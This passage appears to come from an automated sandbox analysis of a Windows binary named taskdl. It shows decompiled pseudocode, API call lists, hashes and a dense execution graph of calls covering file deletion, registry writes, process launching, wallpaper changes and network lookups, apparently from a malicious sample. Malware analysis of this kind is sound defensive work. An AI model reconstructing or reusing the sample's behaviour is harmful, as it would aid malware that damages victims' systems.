                                  					L004018F0();
                                  					_t159 =  *(_t160 + 0x14);
                                  					 *(_t160 + 0x1c) = _t79;
                                  					_t106 = _t79;
                                  					_t152 =  *((intOrPtr*)(_t159 + 4));
                                  					_t161 = _t160 + 4;
                                  					if(_t152 !=  *(_t160 + 0x24)) {
                                  						do {
                                  							E00401690(_t117, _t106, _t152);
                                  							_t101 =  *((intOrPtr*)(_t161 + 0x28));
                                  							_t152 = _t152 + 0x10;
                                  							_t161 = _t161 + 8;
                                  							_t106 = _t106 + 0x10;
                                  						} while (_t152 != _t101);
                                  					}
                                  					_t153 = _t106;
                                  					if(_t136 > 0) {
                                  						 *(_t161 + 0x24) = _t136;
                                  						do {
                                  							_t117 =  *((intOrPtr*)(_t161 + 0x28));
                                  							E00401690( *((intOrPtr*)(_t161 + 0x28)), _t153,  *((intOrPtr*)(_t161 + 0x28)));
                                  							_t98 =  *((intOrPtr*)(_t161 + 0x2c));
                                  							_t161 = _t161 + 8;
                                  							_t153 = _t153 + 0x10;
                                  							_t99 = _t98 - 1;
                                  							 *(_t161 + 0x24) = _t99;
                                  						} while (_t99 != 0);
                                  					}
                                  					_t154 =  *((intOrPtr*)(_t161 + 0x20));
                                  					_t81 = (_t136 << 4) + _t106;
                                  					_t107 =  *((intOrPtr*)(_t159 + 8));
                                  					if(_t154 != _t107) {
                                  						 *((intOrPtr*)(_t161 + 0x20)) = _t81;
                                  						do {
                                  							_t81 = E00401690(_t117,  *((intOrPtr*)(_t161 + 0x20)), _t154);
                                  							_t121 =  *((intOrPtr*)(_t161 + 0x28));
                                  							_t154 = _t154 + 0x10;
                                  							_t161 = _t161 + 8;
                                  							_t117 = _t121 + 0x10;
                                  							 *((intOrPtr*)(_t161 + 0x20)) = _t121 + 0x10;
                                  						} while (_t154 != _t107);
                                  					}
                                  					_t108 =  *((intOrPtr*)(_t159 + 8));
                                  					_t155 =  *((intOrPtr*)(_t159 + 4));
                                  					while(_t155 != _t108) {
                                  						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
                                  						_t155 = _t155 + 0x10;
                                  					}
                                  					E004018D0(_t81,  *((intOrPtr*)(_t159 + 4)));
                                  					_t135 =  *((intOrPtr*)(_t161 + 0x1c));
                                  					_t119 =  *((intOrPtr*)(_t159 + 4));
                                  					 *((intOrPtr*)(_t159 + 0xc)) = ( *(_t161 + 0x18) << 4) + _t135;
                                  					if(_t119 != 0) {
                                  						 *((intOrPtr*)(_t159 + 4)) = _t135;
                                  						_t91 = (( *((intOrPtr*)(_t159 + 8)) - _t119 >> 4) + _t136 << 4) + _t135;
                                  						 *((intOrPtr*)(_t159 + 8)) = _t91;
                                  						return _t91;
                                  					} else {
                                  						 *((intOrPtr*)(_t159 + 4)) = _t135;
                                  						_t95 = (_t136 << 4) + _t135;
                                  						 *((intOrPtr*)(_t159 + 8)) = _t95;
                                  						return _t95;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00401423
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,75F55320,00000000,00000000,?,?,00000001,?), ref: 004015C0
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,75F55320,00000000,00000000,?,?,00000001,?), ref: 0040163D
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,75F55320,00000000,00000000,?,?,00000001,?), ref: 0040166A
                                    • Part of subcall function 00401690: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016EE
                                    • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016F6
                                    • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                    • Part of subcall function 00401690: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                    • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$V12@$?assign@?$basic_string@$Split@?$basic_string@$??2@Eos@?$basic_string@Grow@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 3154500504-0
                                  • Opcode ID: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                  • Instruction ID: 1a94831c173c9211e28d46cdbba668eac71917d736910117d3345b582314b656
                                  • Opcode Fuzzy Hash: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                  • Instruction Fuzzy Hash: FA81B472A003109BD710DE18CC8492AB7E5FBC8358F094A3EED49BB391D636EE05CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:10.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:18.5%
                                  Total number of Nodes:1584
                                  Total number of Limit Nodes:17
DeleteFileW 5685 402a6a #825 5678->5685 5686 402a4f 5678->5686 5679->5521 5680->5684 5692 402560 59 API calls 5680->5692 5681->5674 5683 4028d0 wcscmp 5681->5683 5682->5671 5682->5673 5682->5674 5695 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5682->5695 5708 402af0 _wcsnicmp 5682->5708 5683->5674 5688 4028e6 wcscmp 5683->5688 5684->5678 5694 4026b0 84 API calls 5684->5694 5690 402a94 5685->5690 5691 402aba #825 5685->5691 5697 402a66 5686->5697 5734 402e90 5686->5734 5688->5674 5693 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5688->5693 5690->5691 5699 402e90 2 API calls 5690->5699 5691->5679 5692->5680 5696 402da0 8 API calls 5693->5696 5694->5684 5730 402da0 #823 5695->5730 5700 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5696->5700 5697->5685 5699->5690 5700->5674 5703 402e7a 5702->5703 5707 402e10 5702->5707 5703->5670 5704 402e4c #825 5705 402e6d 5704->5705 5704->5707 5705->5670 5706 402e40 #825 5706->5704 5707->5704 5707->5706 5709 402b12 wcsstr 5708->5709 5710 402b1f 5708->5710 5709->5710 5711 402b30 _wcsicmp 5710->5711 5712 402be9 _wcsicmp 5710->5712 5713 402b42 5711->5713 5714 402b4d _wcsicmp 5711->5714 5715 402c07 _wcsicmp 5712->5715 5716 402bfc 5712->5716 5713->5682 5719 402b67 _wcsicmp 5714->5719 5720 402b5c 5714->5720 5717 402c21 _wcsicmp 5715->5717 5718 402c16 5715->5718 5716->5682 5717->5682 5718->5682 5721 402b81 _wcsicmp 5719->5721 5722 402b76 5719->5722 5720->5682 5723 402b90 5721->5723 5724 402b9b _wcsicmp 5721->5724 5722->5682 5723->5682 5725 402bb5 wcsstr 5724->5725 5726 402baa 5724->5726 5727 402bc4 5725->5727 5728 402bcf wcsstr 5725->5728 5726->5682 5727->5682 5728->5712 5729 402bde 5728->5729 5729->5682 5731 402dbf 5730->5731 5739 402f10 5731->5739 
5733 402de4 5733->5700 5735 402ed0 #825 5734->5735 5736 402eb1 5734->5736 5735->5686 5737 402ec4 #825 5736->5737 5738 402ebd 5736->5738 5737->5735 5738->5735 5740 402f40 5739->5740 5747 403044 5739->5747 5741 402f68 5740->5741 5746 402fdb 5740->5746 5743 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5741->5743 5744 402f6e ?_Xran@std@ 5741->5744 5742 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5742->5747 5748 402f85 5743->5748 5744->5743 5745 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5745->5733 5746->5742 5749 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5746->5749 5747->5733 5748->5745 5750 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5748->5750 5751 403006 5749->5751 5750->5745 5752 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5750->5752 5751->5733 5752->5745 5754 404770 3 API calls 5753->5754 5755 401fac 5754->5755 5756 404770 3 API calls 5755->5756 5757 401fb4 5756->5757 5757->5757 5759 401fe3 5757->5759 5760 401fd0 GlobalFree 5757->5760 5758 40200c 5758->5525 5759->5758 5761 401ff9 GlobalFree 5759->5761 5760->5759 5761->5758 5762->5527 5763->5529 6016 403560 6017 40358c #4376 6016->6017 6018 40356e GetExitCodeThread 6016->6018 6019 403593 6017->6019 6018->6017 6018->6019 6402 409f60 RectVisible 6403 401760 #6453 6404 401791 WaitForSingleObject TerminateThread CloseHandle 6403->6404 6405 4017b8 6403->6405 6404->6405 6406 40193e 6405->6406 6407 4018f6 6405->6407 6408 4017d8 sprintf fopen 6405->6408 6409 401915 6407->6409 6412 401903 rand 6407->6412 6410 401834 8 API calls 6408->6410 6411 4018da #1200 6408->6411 6409->6406 6413 401939 #1200 6409->6413 6410->6406 6411->6406 6412->6409 6413->6406 5764 404070 #693 5765 404088 5764->5765 5766 40407f #825 5764->5766 5766->5765 5767 40a070 DrawTextA 6021 408d70 6022 408e09 GetDeviceCaps 6021->6022 6024 408eb0 
6022->6024 6030 408ed8 6022->6030 6025 408eba GetDeviceCaps GetDeviceCaps 6024->6025 6024->6030 6025->6030 6026 4090b6 #2414 6027 408f51 _ftol _ftol 6027->6030 6028 408fca _ftol _ftol _ftol 6029 409024 CreateSolidBrush #1641 6028->6029 6028->6030 6029->6030 6030->6026 6030->6027 6030->6028 6031 409048 FillRect #2414 6030->6031 6032 409083 #2754 6030->6032 6031->6030 6032->6030 6150 404670 6155 404690 DeleteCriticalSection 6150->6155 6152 404678 6153 404688 6152->6153 6154 40467f #825 6152->6154 6154->6153 6155->6152 6414 409b70 #2379 6421 403f70 6426 403f90 #2414 6421->6426 6423 403f78 6424 403f88 6423->6424 6425 403f7f #825 6423->6425 6425->6424 6426->6423 6427 404f70 #4476 6428 404f91 6427->6428 6429 404fc7 #3089 6427->6429 6428->6429 6430 404f9b 6428->6430 6156 403271 #2302 #2302 6157 406a00 #4476 6158 406a23 6157->6158 6160 406a62 6157->6160 6159 406a38 #3089 6158->6159 6158->6160 6159->6160 6161 406a46 #3089 6159->6161 6161->6160 6162 406a54 #3089 6161->6162 6162->6160 6163 401600 6164 4016e5 6163->6164 6165 40161a 6163->6165 6166 4016e9 #537 6164->6166 6170 4016de 6164->6170 6167 40161d 6165->6167 6168 40168f 6165->6168 6186 401970 #3092 #6199 #800 6166->6186 6172 401743 #2385 6167->6172 6175 401628 #537 6167->6175 6176 40165e 6167->6176 6169 401693 #537 6168->6169 6168->6170 6185 401970 #3092 #6199 #800 6169->6185 6170->6172 6174 401701 SendMessageA #2385 6183 401970 #3092 #6199 #800 6175->6183 6176->6170 6179 401663 #537 6176->6179 6177 4016ab SendMessageA #2385 6184 401970 #3092 #6199 #800 6179->6184 6180 401640 #2385 6182 40167b #2385 6183->6180 6184->6182 6185->6177 6186->6174 6431 403f00 6436 403f20 #2414 6431->6436 6433 403f08 6434 403f18 6433->6434 6435 403f0f #825 6433->6435 6435->6434 6436->6433 4758 413102 __set_app_type __p__fmode __p__commode 4759 413171 4758->4759 4760 413185 4759->4760 4761 413179 __setusermatherr 4759->4761 4770 4133b2 _controlfp 4760->4770 4761->4760 4763 41318a _initterm __getmainargs _initterm 4764 4131de GetStartupInfoA 
4763->4764 4766 413212 GetModuleHandleA 4764->4766 4771 4133e6 #1576 4766->4771 4769 413236 exit _XcptFilter 4770->4763 4771->4769 5768 403810 WideCharToMultiByte 5771 403e60 SendMessageA #3998 SendMessageA 5768->5771 5770 403845 5771->5770 5772 403410 #4476 5773 403454 #3089 5772->5773 5774 403431 5772->5774 5775 40343b 5773->5775 5774->5773 5774->5775 5776 404410 SetCursor 6033 401110 #2302 6437 404310 6438 404333 6437->6438 6439 40433a #470 #5789 #5875 #6172 6437->6439 6440 4044c0 7 API calls 6438->6440 6441 40438a #5789 #755 6439->6441 6440->6439 6442 401f10 6443 401f30 6 API calls 6442->6443 6444 401f18 6443->6444 6445 401f28 6444->6445 6446 401f1f #825 6444->6446 6446->6445 6193 40ca19 6194 40ca26 6193->6194 6195 40ca28 #823 6193->6195 6194->6195 6038 409920 6043 4098c0 6038->6043 6041 409938 6042 40992f #825 6042->6041 6044 4098f2 #5875 6043->6044 6045 4098fb 6043->6045 6044->6045 6045->6041 6045->6042 5777 40a020 TabbedTextOutA 5778 409c20 #3797 5779 409c40 #6734 5778->5779 5780 409c36 5778->5780 5781 409c5b SendMessageA 5779->5781 5782 409c78 5779->5782 5781->5782 5783 409ce4 5782->5783 5784 409caa 5782->5784 5785 409cf6 5783->5785 5786 409ce8 InvalidateRect 5783->5786 5787 409cd4 #4284 5784->5787 5788 409cc4 #4284 5784->5788 5786->5785 5787->5785 5788->5785 6215 409a20 6220 4099c0 6215->6220 6218 409a38 6219 409a2f #825 6219->6218 6221 409a03 6220->6221 6222 4099f3 #6170 6220->6222 6221->6218 6221->6219 6222->6221 6451 409b20 6452 409b31 6451->6452 6453 409b33 #6140 6451->6453 6452->6453 6196 401220 6197 4012c2 #2379 6196->6197 6198 401233 6196->6198 6199 401243 SendMessageA KillTimer #4853 6198->6199 6200 40126b SendMessageA 6198->6200 6199->6200 6201 401285 SendMessageA 6200->6201 6202 401297 6200->6202 6201->6202 6202->6197 6203 4012a1 SendMessageA 6202->6203 6203->6197 6204 4012b8 6203->6204 6204->6197 6205 405a20 6206 405a25 6205->6206 6209 4130bb 6206->6209 6212 41308f 6209->6212 6211 405a4a 6213 4130a4 __dllonexit 6212->6213 6214 413098 _onexit 
6212->6214 6213->6211 6214->6211 6223 404620 #795 6224 404638 6223->6224 6225 40462f #825 6223->6225 6225->6224 5789 408c20 5794 408b40 5789->5794 5791 408c28 5792 408c38 5791->5792 5793 408c2f #825 5791->5793 5793->5792 5795 408bd0 5794->5795 5796 408b78 BitBlt 5794->5796 5798 408bd6 #2414 #640 5795->5798 5799 408bc1 #5785 5796->5799 5800 408bb5 #5785 5796->5800 5798->5791 5799->5798 5800->5798 5801 413427 5802 41342c 5801->5802 5805 4133fe #1168 5802->5805 5806 413421 5805->5806 5807 413418 _setmbcp 5805->5807 5807->5806 5811 407c30 OpenClipboard 5812 407c42 GlobalAlloc 5811->5812 5813 407ca9 5811->5813 5814 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5812->5814 5815 407c5b CloseClipboard 5812->5815 5814->5813 5808 40d830 inet_addr 5809 40d844 gethostbyname 5808->5809 5810 40d84f 5808->5810 5809->5810 5816 404430 5817 40447b 5816->5817 5818 40443d _TrackMouseEvent #2379 5816->5818 5821 404489 5817->5821 5823 404530 5817->5823 5822 4044a1 SetCursor #2379 5821->5822 5824 4045c1 5823->5824 5825 404552 5823->5825 5824->5821 5825->5824 5826 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5825->5826 5826->5824 6046 406930 #6215 6047 402d30 6048 402d73 #825 6047->6048 6049 402d3f 6047->6049 6050 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6049->6050 6050->6050 6051 402d72 6050->6051 6051->6048 6226 405230 6233 405369 6226->6233 6236 40525a 6226->6236 6227 405552 InvalidateRect 6232 405560 6227->6232 6228 405285 6229 4052ee 7 API calls 6228->6229 6230 40528f #4277 #923 #858 #800 #800 6228->6230 6229->6227 6230->6227 6231 40539e 6234 405430 6231->6234 6235 4053aa 7 API calls 6231->6235 6233->6227 6233->6231 6240 405390 #940 6233->6240 6237 4054b4 6234->6237 6238 405435 7 API calls 6234->6238 6235->6227 6236->6228 6239 405277 #940 6236->6239 6241 4054b8 6237->6241 6243 405503 6237->6243 6238->6227 6239->6228 6239->6239 6240->6231 6240->6240 6241->6227 6242 4054de #6778 #6648 6241->6242 
6242->6242 6244 405501 6242->6244 6243->6227 6243->6232 6245 405529 #6778 #6648 6243->6245 6244->6227 6245->6227 6245->6245 6246 40d630 6251 40d650 6246->6251 6248 40d638 6249 40d648 6248->6249 6250 40d63f #825 6248->6250 6250->6249 6252 40dad0 4 API calls 6251->6252 6253 40d680 6252->6253 6253->6248 6052 402531 6053 402543 6052->6053 6054 40253c CloseHandle 6052->6054 6055 402555 6053->6055 6056 40254e CloseHandle 6053->6056 6054->6053 6056->6055 6254 40ca3a 6257 40ca40 6254->6257 6255 40ca81 6256 40ca87 #825 6256->6255 6257->6255 6257->6256 5827 4068c0 #4837 6258 4032c0 6 API calls 6259 403334 SendMessageA #3092 6258->6259 6261 40335c SendMessageA #3092 6259->6261 6263 40337b SendMessageA #3092 6261->6263 6265 4033a0 SendMessageA 6263->6265 6266 40339d 6263->6266 6269 403cb0 FindFirstFileA 6265->6269 6266->6265 6268 4033b2 SendMessageA #3996 SendMessageA 6270 403cd9 6269->6270 6271 403ce3 6269->6271 6270->6268 6272 403e1f FindNextFileA 6271->6272 6274 403d14 sscanf 6271->6274 6272->6271 6273 403e3a FindClose 6272->6273 6273->6268 6274->6272 6275 403d38 fopen 6274->6275 6275->6272 6276 403d5c fread 6275->6276 6277 403e15 fclose 6276->6277 6281 403d7b 6276->6281 6277->6272 6278 403d8f sprintf 6279 403dd4 SendMessageA #823 SendMessageA 6278->6279 6279->6277 6281->6277 6281->6278 6281->6279 6282 401c30 inet_ntoa 6281->6282 6282->6281 6454 4043c0 #6453 #2414 6455 409fc0 TextOutA 4772 4064d0 #4710 SendMessageA SendMessageA 4816 401c70 wcscat 4772->4816 4774 406516 4775 406577 4774->4775 4776 40651d GetModuleFileNameA strrchr 4774->4776 4825 401a10 4775->4825 4777 40656c SetCurrentDirectoryA 4776->4777 4778 40655d strrchr 4776->4778 4777->4775 4778->4777 4780 406585 4781 4065e5 4780->4781 4782 40658c time 4780->4782 4835 402c40 4781->4835 4783 401a10 5 API calls 4782->4783 4783->4781 4785 4065ed __p___argc 4786 406606 4785->4786 4787 40678c 4786->4787 4788 40660f __p___argv 4786->4788 4883 407e80 SHGetFolderPathW wcslen 4787->4883 4790 406621 4788->4790 4793 406661 
__p___argv 4790->4793 4794 406652 4790->4794 4791 406793 SetWindowTextW 4886 406f80 4791->4886 4797 40666d 4793->4797 4859 407f80 fopen 4794->4859 4795 4067a9 4944 406c20 GetUserDefaultLangID GetLocaleInfoA 4795->4944 4801 4066ad __p___argv 4797->4801 4802 40669e 4797->4802 4800 4067b0 SetTimer SetTimer 4804 4066b9 4801->4804 4841 4080c0 FindFirstFileA 4802->4841 4804->4787 4807 4066ee Sleep 4804->4807 4869 401bb0 AllocateAndInitializeSid 4807->4869 4809 406734 4810 406750 sprintf 4809->4810 4811 406738 4809->4811 4875 401a90 CreateProcessA 4810->4875 4874 401b50 ShellExecuteExA 4811->4874 4814 40674b ExitProcess 4817 401cdc 4816->4817 4818 401d00 RegCreateKeyW 4817->4818 4819 401d62 RegQueryValueExA 4817->4819 4820 401d1d GetCurrentDirectoryA RegSetValueExA 4817->4820 4821 401dbb 4817->4821 4818->4817 4822 401d9e RegCloseKey 4819->4822 4823 401d90 SetCurrentDirectoryA 4819->4823 4820->4822 4821->4774 4822->4817 4824 401dc8 4822->4824 4823->4822 4824->4774 4826 401a1a fopen 4825->4826 4828 401a3a 4826->4828 4829 401a6f 4826->4829 4830 401a53 fwrite 4828->4830 4831 401a46 fread 4828->4831 4829->4780 4832 401a5e 4830->4832 4831->4832 4833 401a74 fclose 4832->4833 4834 401a66 fclose 4832->4834 4833->4780 4834->4829 4953 404b70 4835->4953 4837 402c46 4838 402c57 4837->4838 4839 402c5e LoadLibraryA 4837->4839 4838->4785 4839->4838 4840 402c73 7 API calls 4839->4840 4840->4838 4842 40820a 4841->4842 4854 408124 4841->4854 4958 401e30 4842->4958 4845 4081e4 FindNextFileA 4846 4081ff FindClose 4845->4846 4845->4854 4846->4842 4847 401e30 2 API calls 4849 408255 sprintf #537 4847->4849 4848 408158 sscanf 4848->4845 4850 408178 fopen 4848->4850 4963 4082c0 4849->4963 4850->4845 4852 408190 fread 4850->4852 4852->4854 4855 4081bd fclose 4852->4855 4854->4845 4854->4848 4854->4855 4855->4845 4855->4854 4856 408291 #537 4858 4082c0 141 API calls 4856->4858 4857 4066a5 ExitProcess 4858->4857 4860 407fd0 fread fclose 4859->4860 4868 406659 ExitProcess 4859->4868 5333 40be90 
strncpy strncpy strncpy 4860->5333 4862 408002 5334 40c4f0 4862->5334 4864 40801d 4865 40c4f0 112 API calls 4864->4865 4866 408041 4864->4866 4865->4866 4867 401a10 5 API calls 4866->4867 4866->4868 4867->4868 4870 401bf6 4869->4870 4871 401bfb CheckTokenMembership 4869->4871 4870->4809 4872 401c10 4871->4872 4873 401c14 FreeSid 4871->4873 4872->4873 4873->4809 4874->4814 4876 401b45 4875->4876 4877 401aed 4875->4877 4876->4814 4878 401af5 WaitForSingleObject 4877->4878 4879 401b26 CloseHandle CloseHandle 4877->4879 4880 401b12 4878->4880 4881 401b05 TerminateProcess 4878->4881 4879->4814 4880->4879 4882 401b1a GetExitCodeProcess 4880->4882 4881->4880 4882->4879 4884 407f02 4883->4884 4885 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4883->4885 4884->4791 4885->4791 5348 4076a0 4886->5348 4888 406fa8 27 API calls 4889 407119 4888->4889 4890 40711c SendMessageA #3092 4888->4890 4889->4890 4891 40713d SendMessageA #3092 4890->4891 4893 40715f SendMessageA #3092 4891->4893 4895 407181 SendMessageA #3092 4893->4895 4897 4071a3 SendMessageA #3092 4895->4897 4899 4071c5 SendMessageA #3092 4897->4899 4901 4071e7 4899->4901 4902 4071ea SendMessageA #3092 4899->4902 4901->4902 4903 407205 SendMessageA #3092 4902->4903 4905 407227 SendMessageA #3092 4903->4905 4907 407249 SendMessageA #3092 4905->4907 4909 40726b 4907->4909 4910 40726e SendMessageA #860 4907->4910 4909->4910 4911 4072a4 4910->4911 4912 4072ed #537 4911->4912 5364 404210 #858 #800 4912->5364 4914 407309 #537 5365 404210 #858 #800 4914->5365 4916 407325 #540 #2818 #535 5366 404210 #858 #800 4916->5366 4918 407369 5367 404270 4918->5367 4922 4073a8 SendMessageA SendMessageA #6140 #6140 4923 407428 4922->4923 5371 405920 4923->5371 4927 407457 5379 4058c0 4927->5379 4929 407460 5382 405180 _mbscmp 4929->5382 4931 407477 4932 405920 2 API calls 4931->4932 4933 4074ac 4932->4933 4934 405860 2 API calls 4933->4934 4935 4074b5 4934->4935 4936 4058c0 2 API calls 4935->4936 4937 4074be 
4936->4937 4938 405180 4 API calls 4937->4938 4939 4074d5 GetTimeZoneInformation 4938->4939 5388 401e60 VariantTimeToSystemTime 4939->5388 4941 407508 SystemTimeToTzSpecificLocalTime #2818 5389 401e60 VariantTimeToSystemTime 4941->5389 4943 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4943->4795 4945 406c81 SendMessageA 4944->4945 4946 406c5d 4944->4946 4947 406cc1 SendMessageA 4945->4947 4948 406ca1 SendMessageA 4945->4948 4946->4945 4950 406ae0 27 API calls 4947->4950 5396 406ae0 8 API calls 4948->5396 4951 406cdd 4950->4951 4951->4800 4952 406cba 4952->4800 4954 404b81 LoadLibraryA 4953->4954 4955 404b7a 4953->4955 4956 404b96 6 API calls 4954->4956 4957 404bf6 4954->4957 4955->4837 4956->4957 4957->4837 4990 401e60 VariantTimeToSystemTime 4958->4990 4960 401e42 4991 401de0 sprintf 4960->4991 4962 401e51 4962->4847 4964 408337 4963->4964 4965 4082fb #4278 #858 #800 4963->4965 4966 408344 4964->4966 4967 408378 time 4964->4967 4965->4964 4968 408359 #800 4966->4968 4969 40834d #1200 4966->4969 4970 40839c 4967->4970 4971 40844d time 4967->4971 4972 40828c 4968->4972 4969->4968 4970->4971 4973 4083a9 4970->4973 4971->4973 4974 408466 4971->4974 4972->4856 4972->4857 4975 4083bb 4973->4975 4976 40846c fopen 4973->4976 4974->4976 4977 4083c4 #540 time #2818 #1200 #800 4975->4977 4978 40842e #800 4975->4978 4979 4084b5 fread fclose 4976->4979 4980 408496 #800 4976->4980 4977->4978 4978->4972 4992 40be90 strncpy strncpy strncpy 4979->4992 4980->4972 4982 4084e7 4993 40c060 4982->4993 4984 408501 4985 408516 4984->4985 4986 408538 4984->4986 4987 408549 #800 4985->4987 4988 40851a #1200 time 4985->4988 4986->4987 4989 40853c #1200 4986->4989 4987->4972 4988->4987 4989->4987 4990->4960 4991->4962 4992->4982 4994 40c07f 4993->4994 5020 40bed0 4994->5020 4996 40c0ba 4997 40c0c1 4996->4997 4998 40c0e7 4996->4998 4999 40c0cc SendMessageA 4997->4999 5002 40c0db 4997->5002 5000 40c104 4998->5000 5001 40c0f8 SendMessageA 4998->5001 4999->5002 5039 40dd00 5000->5039 
5001->5000 5004 40dbf0 free 5002->5004 5005 40c173 5004->5005 5005->4984 5006 40c116 5007 40c144 5006->5007 5008 40c17b 5006->5008 5009 40c154 5007->5009 5010 40c148 SendMessageA 5007->5010 5011 40c18b 5008->5011 5012 40c17f SendMessageA 5008->5012 5042 40dbf0 5009->5042 5010->5009 5014 40c1b4 5011->5014 5015 40c1e8 5011->5015 5012->5011 5016 40c1c4 5014->5016 5017 40c1b8 SendMessageA 5014->5017 5015->5002 5018 40c1f5 SendMessageA 5015->5018 5019 40dbf0 free 5016->5019 5017->5016 5018->5002 5019->5005 5021 40bef5 5020->5021 5022 40bf0a #823 5020->5022 5021->5022 5023 40bf2e 5022->5023 5024 40bf27 5022->5024 5026 40bf46 5023->5026 5050 40baf0 5023->5050 5046 40d5e0 5024->5046 5026->4996 5029 40bf72 5029->4996 5030 40bf8a GetComputerNameA GetUserNameA 5082 40dc00 5030->5082 5033 40dd00 4 API calls 5034 40c01f 5033->5034 5035 40dc00 4 API calls 5034->5035 5036 40c038 5035->5036 5037 40dd00 4 API calls 5036->5037 5038 40c047 5037->5038 5038->4996 5040 40dc00 4 API calls 5039->5040 5041 40dd1c 5040->5041 5041->5006 5043 40dd70 5042->5043 5044 40dd8b 5043->5044 5329 412ac0 5043->5329 5044->5005 5047 40d602 5046->5047 5091 40dad0 5047->5091 5094 40ba10 5050->5094 5052 40bdf5 5052->5029 5052->5030 5053 40bb14 5053->5052 5054 40bb42 5053->5054 5099 40ba60 5053->5099 5054->5052 5103 40c8f0 #823 5054->5103 5058 40bc1b strtok 5060 40bc30 5058->5060 5074 40bbb7 5058->5074 5059 40ba60 closesocket 5062 40bc8b 5059->5062 5060->5059 5064 40bcec GetTickCount srand 5060->5064 5063 40bc92 5062->5063 5062->5064 5125 40c860 5063->5125 5066 40bdc7 5064->5066 5067 40bd07 rand 5064->5067 5070 40c860 2 API calls 5066->5070 5071 40bd1e 5067->5071 5069 40bcd8 #825 5069->5052 5073 40bde8 #825 5070->5073 5076 40ba60 closesocket 5071->5076 5079 40be11 5071->5079 5131 40ce50 5071->5131 5073->5052 5074->5058 5075 40c7b0 #825 5074->5075 5105 40c7b0 5074->5105 5109 40c920 5074->5109 5121 40c800 #823 5074->5121 5075->5058 5076->5071 5077 40be75 #825 5077->5052 5079->5077 5137 40c740 5079->5137 5083 
